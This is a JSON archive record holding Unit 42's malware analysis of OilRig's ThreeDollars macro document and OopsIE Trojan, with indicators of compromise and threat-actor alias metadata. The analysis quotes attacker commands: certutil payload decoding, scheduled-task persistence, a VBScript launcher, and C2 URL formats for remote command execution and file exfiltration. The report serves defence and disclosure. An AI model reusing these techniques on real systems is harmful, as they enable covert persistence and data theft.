{ "id": "447229a8-c082-4cdb-a257-f45daf469a51", "created_at": "2026-04-06T00:12:27.353715Z", "updated_at": "2026-04-10T13:11:46.849645Z", "deleted_at": null, "sha1_hash": "610e1fe75065ded11c12817ade25a645b86d74e2", "title": "OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 472222, "plain_text": "OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2018-02-23 · Archived: 2026-04-05 17:14:34 UTC\r\nThe OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On\r\nJanuary 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the\r\nMiddle East. Just over a week later, on January 16, 2018, we observed an attack on a Middle Eastern financial\r\ninstitution. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE.\r\nThe January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the\r\nOilRig toolset based on attacks that occurred in August 2017.\r\nHowever, the attack on January 16 did not involve ThreeDollars at all. Instead, this attack involved delivering the\r\nOopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted\r\norganization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017.\r\nThis repeat attack may suggest that the adversaries have lost their foothold in the targeted organization, or that it\r\nmay be considered a high value target.\r\n  A New Attack\r\nOn January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to\r\nan insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the\r\nsame organization within a six minutes time span. The recipient email addresses suggest they may be the\r\naddresses used for specific regional branches of the targeted organization.\r\nBoth emails originated from the same address. The email address is associated with the Lebanese domain of a\r\nmajor global financial institution. However, based upon the captured session data, it is highly likely the source\r\nemail address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a\r\nmalicious Microsoft Word document we track as ThreeDollars. Examining this sample of ThreeDollars reveals\r\nthat it contains a new payload, which we have named OopsIE.\r\nIn the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January\r\n2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver\r\nthe OopsIE Trojan directly to the targeted organization, likely via a link within an email. The Trojan was directly\r\ndownloaded from the command and control server for OopsIE, signifying that this server was also used for\r\nstaging. This suggests that due to the January 2017 attack, the targeted organization may have taken actions to\r\ncounter known OilRig TTPs, in this case delivering malicious macro documents, causing the OilRig operators to\r\nadopt a different delivery tactic.\r\nWe also identified another sample of ThreeDollars, created on January 15, 2017 with the file name strategy\r\npreparation.dot. While this sample was very similar to the Seminar-Invitation.doc sample it also had some\r\nsignificant differences. The primary difference was that this sample was encrypted and password protected,\r\nrequiring the victim to enter in a password which was likely provided by the adversary to view the document.\r\nWhile this is not a new tactic, this is the first instance where we have observed the OilRig using it in their\r\nplaybook. Typically, password protected documents is commonly used by adversaries as an evasion tactic to\r\nbypass automated analysis mechanisms due to the password requirement for successful execution. As we have\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 1 of 8\n\nobserved throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over\r\ntime.\r\n  ThreeDollars Document Analysis\r\nThe samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we\r\nanalyzed in October 2017, down to the lure image used to trick the recipient into clicking the “Enable Content”\r\nbutton to execute the malicious macro. The images used in the January 2018 attacks were the exact same in each\r\nsample, verified by file hash.\r\nFigure 1 shows the lure image extracted from the newer attacks, and the lure image from the first sample we\r\nanalyzed. While it is unsurprising that attacks originating from the same adversary group would use the same\r\nresource over time, we analyzed exactly how similar these lure images were.\r\n \r\nFigure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks\r\n \r\nSuperficially, we can immediately see the images are quite similar, but with some glaring differences. The image\r\nfrom the August 2017 attack for example, is significantly larger, using an image resolution of 3508 pixels x 4961\r\npixels which is also the exact resolution for a sheet of A3 paper at 300 dpi. It also contains some additional\r\nartifacts in the image, such as the inclusion of the Microsoft logo as well as additional text, specifically “against\r\nunauthorized use”. In comparison, the newer lure image appears to be horizontally distorted due to it being resized\r\nto fit into the constraints of the document. In addition, the period after “This document is protected” is misaligned.\r\nBy overlaying these two lure images and accounting for the newer image’s distortion, we are able to clearly\r\nvisualize that the newer image is highly likely to be a cropped and edited version of the August 2017 image.\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 2 of 8\n\nExamining the color code used in both images also shows they are the exact same, #da3b01. The dimensions of\r\nthe newer image are roughly 40% of the older October image, suggesting that after cropping and editing the newer\r\nimage, the creator is also likely to have resized the image. One peculiar artifact from the original image is the\r\nusage of the “st” (unicode \\uFB06) ligature in the word “against”. This is a highly uncommon glyph and is not\r\ngenerally available in standard keyboard layouts. This may suggest that the string was machine generated rather\r\nthan directly inputted from a keyboard. The use of this glyph also may suggest that the actor is not a native\r\nEnglish speaker.\r\n  Malicious Macro Analysis\r\nWhen the victim opens the ThreeDollars document they are presented with the lure image and prompted to click\r\non the “Enable Content” button. When button is clicked, a malicious macro is silently run which installs then\r\nexecutes a payload on a system. A decoy image is also displayed to the victim to lower suspicion of malicious\r\nactivity. The decoy message that is eventually presented to the victim does not actually show the expected content\r\nof an insurance seminar invitation as presented in the delivery email. Instead, it displays a fake error message of\r\nNullRefrencedException! error has occurred in user32.dll by 0x32ef2121 within the Word document, as seen in\r\nFigure 2.\r\n \r\nFigure 2 Decoy message displayed by the malicious macro in ThreeDollars delivery document\r\n \r\nWhile the decoy in Figure 2 is displayed, the macro will search the document for the delimiter ###$$$ and write\r\nthe base64 encoded text that follows this delimiter to the file %APPDATA%\\Base.txt. The macro then creates a\r\nscheduled task named SecurityAssist that runs after waiting one minute. The SecurityAssist task is responsible for\r\nrunning the following command line command that uses the Certutil application to decode the base64 encoded\r\ndata in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 3 of 8\n\ncmd.exe /c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe \u0026 SchTasks\r\n/Delete /F /TN SecurityAssist\r\nThe macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript\r\n%APPDATA%\\chkSrv.vbs. The macro saves the chkSrv.vbs script to the system, which is responsible for running\r\nthe IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two\r\nscheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script.\r\n  OopsIE Trojan Analysis\r\nThe OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with\r\nConfuserEx v1.0.0. To run persistently on the system, the Trojan will first create a VBScript file:\r\nSpecialFolder.CommonApplicationData\\srvResesponded.vbs\r\nthat contains:\r\nCreateObject(\"WScript.Shell\").Run(\"%app%\")\r\nThe Trojan replaces the %app% string in the above VBScript with the path to its executable. Finally, the Trojan\r\ncreates a scheduled task to run itself every three minutes by running the following command on the command\r\nprompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:\r\nSchTasks /Create /SC MINUTE /MO 3 /TN \"InetlSecurityAssistManager\" /TR \"wscript %path%\" /f\r\nThe Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application\r\nobject within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw. The Trojan extracts\r\nand loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and\r\ndecompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is\r\npacked with SmartAssembly and further obfuscated using Confuser v1.9.0.0. The concatenation of resources to\r\nconstruct embedded assemblies is not a new technique for the OilRig group, as they used the very same technique\r\nin October 2017 in their ISMInjector tool to construct its embedded libraries Joiner.dll and Inner.dll.\r\nBy using the InternetExplorer application object, all C2 related requests will look as if they came from the\r\nlegitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. The OopsIE Trojan is configured to use a C2 server hosted at:\r\nwww.msoffice365cdn[.]com\r\nThe Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server's response\r\nlooking for content within the tags \u003cpre\u003e and \u003c/pre\u003e. The initial HTTP request acts as a beacon, as shown in the\r\nimage below.\r\n \r\n  As seen in the above request, the Trojan will generate a URL for its beacon with the following structure:\r\nhttp://\u003cc2 domain\u003e/chk?\u003chex(Environment.UserName/Environment.MachineName)\u003e\r\nThe Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 4 of 8\n\ncommand for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value\r\n\u003chex(Environment.UserName/Environment.MachineName)\u003e if it wishes to provide additional commands. If the\r\nC2 server does not respond with the appropriate echoed data, the Trojan will create a file named\r\nsrvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before\r\nexiting.\r\nIf the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what \r\ncommands the C2 wishes to run by issuing a request to the following URL:\r\nhttp://\u003cc2 domain\u003e/what?\u003chex(Environment.UserName/Environment.MachineName)\u003e\r\nAfter issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will\r\ntreat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a\r\nset of parameters, split up by the delimiter \u003c\u003e:\r\n[command]\u003c\u003e[parameters for command in hexadecimal format]\r\nThe available commands are:\r\nCommand Description\r\n1 Run command\r\n2 Upload a file\r\n3 Download a specified file\r\n \r\nThe parameters for each command are issued in hexadecimal format. For instance, the character A would be\r\nrepresented by the two characters 41, which is the hexadecimal representation of that character. This hexadecimal\r\nformat is used extensively throughout this Trojan.\r\nThe run command (1) creates the process cmd.exe /c with the command parameters appended and will write the\r\noutput of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the\r\nhexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to\r\nthe C2 server via an HTTP GET request to a URL with the following structure:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eAAZ\u003chex(command\r\nprompt output)\u003e\r\nThe upload command (2) writes data provided by the C2 to a specified file. The parameters supplied to this\r\ncommand include hexadecimal values for the binary data and the filename, which are split up by a delimiter of (!).\r\nThe Trojan will respond to the C2 to notify it of a successful upload by sending a URL structured as follows:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eAAZ\u003chex(\"File\r\nUploaded\")\u003e\r\nThe download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file\r\ndoes not exist, the Trojan will send the C2 server a message \u003c File Not Found \u003e by sending the following URL:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eAAZ\u003chex(\"\u003c File Not\r\nFound \u003e\")\u003e\r\nIf the file exists, the Trojan will read the contents of the specified file and compresses the contents using the\r\nGZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 5 of 8\n\nfollowing hexadecimal values on each line with ASCII characters to further compressed the data:\r\n \r\nString of hexadecimal values Character replacement\r\n000000 z\r\n00000 x\r\n0000 y\r\n000 g\r\n00 w\r\n01 t\r\n \r\nThe Trojan then writes 1500 bytes of the hexadecimal formatted data, one per line to a temporary file in the\r\nSpecialFolder.CommonApplicationData folder named as:\r\n\u003cday\u003e\u003chour\u003e\u003csecond\u003e\u003cmillisecond\u003e.tmp\r\nThe Trojan will then read each line from this temporary file and send them to the C2 server by issuing requests to\r\na URL structured as follows:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eABZ\u003chex(1500 characters\r\nof hexadecimal formatted file contents)\u003e\r\nOnce all of the lines of hexadecimal formatted data in the temporary file are sent to the C2 server, the Trojan will\r\nsend a request to the C2 server to notify the data has been successfully transmitted via a URL structured as\r\nfollows:\r\nhttp://\u003cc2 domain\u003e/resp?\u003chex(Environment.UserName/Environment.MachineName)\u003eABZFinish\r\n  Overlaps with Previous OilRig Group Attacks\r\nSince May 2016, we have continued to monitor and uncover various attacks and tools associated with the OilRig\r\ngroup. As we discover new tools used by this group, we have consistently discovered overlapping artifacts with\r\npreviously used tools and infrastructure. This type of commonality is unsurprising as we are assuming a single\r\nadversary, and is an excellent example of how adversaries will often times reuse certain tactics and techniques\r\nwhether it is for efficiencies sake or sheer laziness.\r\nIn the attacks described above, we observed a new payload being delivered using a previously unknown command\r\nand control domain. However, as we continued to follow the trail of evidence, we found immediate links to past\r\nattacks and common artifacts from the OilRig group. The most obvious link is the reuse of the ThreeDollars\r\ndelivery document, which we had previously observed delivering a different payload. However, we also found\r\nother connection to other OilRig group attacks starting with the command and control domain,\r\nmsoffice365cdn[.]com.\r\nBeginning with the WHOIS record, we see that the domain was registered by emilia.jones@mail.ru. Examining\r\nadditional domains registered to this email address reveals the domain office365-management[.]com, which we\r\npreviously identified in October 2017 to be an OilRig C2. Continuing to examine the WHOIS records, we see that\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 6 of 8\n\na fairly unique phone number is also used in the record. It is only found in one other WHOIS record, for the\r\ndomain office365-technical[.]info, which is registered to leonard.horner@mail.ru. Based off the relational links\r\nand thematic similarity of the domain name, we have strong reason to believe this domain and registrant are also\r\nattributed to the OilRig group.\r\nMoving onto IP resolutions of the identified domains proves to be fruitful as well. Msoffice365cdn[.]com resolves\r\nto 80.82.79.221, which resides on the same class C network range as the IP resolution of office365-\r\ntechnical[.]info, which resolves to 80.82.79.240. In addition, we find that 80.82.79.221 shares an SSL certificate\r\nwith a small number of other IP addresses, one of which is 185.162.235.29. This IP resolves to office365-\r\nmanagement[.]com which was one of the domains registered by the emilia.jones@mail.ru entity. Inspecting the\r\nclass C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain,\r\nmsoffice-cdn[.]com which we identified in August 2017.\r\nLastly, we examine the delivery document itself. Although we have already identified the documents as a variant\r\nof the ThreeDollars tool and analyzed the lure image used in this document in comparison to the previously used\r\nlure image, additional artifacts also exist to further strengthen the relational link of this sample and the attack to\r\nprevious OilRig attributed tools and attacks. In this case, one of the ThreeDollars samples we collected contained\r\na unique author name of J-Win-7-32-Vm. We had previously observed this author name in use once before, in the\r\nvery first ThreeDollars document we collected that we had reported on in August 2017.\r\n      Conclusion\r\nThe OilRig group continues to remain a highly active adversary in the Middle East region. This group has\r\nrepeatedly shown evidence of a willingness to adapt and evolve their tactics, while also reusing certain aspects as\r\nwell. We have now observed this adversary deploy a multitude of tools, with each appearing to be some form of\r\niterative variation of something used in the past. However, although the tools themselves have morphed over time,\r\nthe plays they have executed in their playbook largely remain the same when examined over the attack life cycle.\r\nWe have added this play to the OilRig playbook, which can be viewed online via our Playbook Viewer.\r\nPalo Alto Networks customers are protected from this threat by:\r\n1. WildFire detects all ThreeDollars and OopsIE payloads with malicious verdicts.\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 7 of 8\n\n2. AutoFocus customers can track these tools with the ThreeDollars and OopsIE\r\n3. Traps blocks the ThreeDollars delivery documents and the OopsIE payload.\r\n4. PanAV detects the ThreeDollars samples as Virus/Win32.WGeneric.pefia and the OopsIE payload as\r\nVirus/Win32.WGeneric.pipwf\r\n \r\nIndicators of Compromise\r\nThreeDollars SHA256\r\nec3f55cac3e8257d6d48e5d543db758fed7d267f14f63a6a5d98ba7a0fab6870\r\n81eb43ad46ed39bd4b869c709e5e468a6fc714485da288aaa77c80291ce6db8c\r\n  OopsIE SHA256\r\n9a040cdd7c9fcde337b2c3daa2a7208e225735747dd1366e6c0fcbc56815a07f\r\n231115a614c99e8ddade4cf4c88472bd3801c5c289595fc068e51b77c2c8563f\r\n  OopsIE C2\r\nwww.msoffice365cdn[.]com\r\n  Related Infrastructure\r\noffice365-management[.]com\r\noffice365-technical[.]info\r\nmsoffice-cdn[.]com\r\n80.82.79.221\r\n80.82.79.240\r\n185.162.235.29\r\nSource: https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], "report_names": [ "unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan" ], "threat_actors": [ { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434347, "ts_updated_at": 1775826706, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/610e1fe75065ded11c12817ade25a645b86d74e2.pdf", "text": "https://archive.orkl.eu/610e1fe75065ded11c12817ade25a645b86d74e2.txt", "img": "https://archive.orkl.eu/610e1fe75065ded11c12817ade25a645b86d74e2.jpg" } }